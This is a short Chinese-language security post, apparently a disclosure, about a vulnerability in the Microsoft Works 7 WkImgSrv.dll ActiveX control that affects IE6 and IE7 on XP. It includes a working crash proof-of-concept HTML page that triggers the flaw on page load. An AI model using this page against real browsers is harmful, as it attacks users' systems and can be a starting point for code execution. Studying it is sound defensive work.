近幾天網(wǎng)絡(luò)上流傳著一個(gè)傳說(shuō)為IE0DAY的POC代碼,在XP系統(tǒng)環(huán)境下通殺了IE6和IE7,其它系統(tǒng)并未經(jīng)過(guò)測(cè)試。其實(shí)這個(gè)漏洞并不是存在于IE,而是Microsoft Works的組件被挖掘出漏洞,部分的XP預(yù)裝了Microsoft Works,所以就出現(xiàn)了過(guò)全補(bǔ)丁系統(tǒng)的漏洞(如華碩易PC 就預(yù)裝了Microsoft Works)。
影響的DLL版本:Microsoft Works 7 WkImgSrv.dll (7.03.0616.0)
以下為crash POC
<html>
<head>
<title>Microsoft Works 7 WkImgSrv.dll crash POC</title>
<script language=”JavaScript”>
function payload() {
var num = -1;
obj.WksPictureInterface = num;
}
</script>
</head>
<body onload=”JavaScript: return payload();”>
<object classid=”clsid:00E1DB59-6EFD-4CE7-8C0A-2DA3BCAAD9C6″ id=”obj”>
</object>
</body>
</html>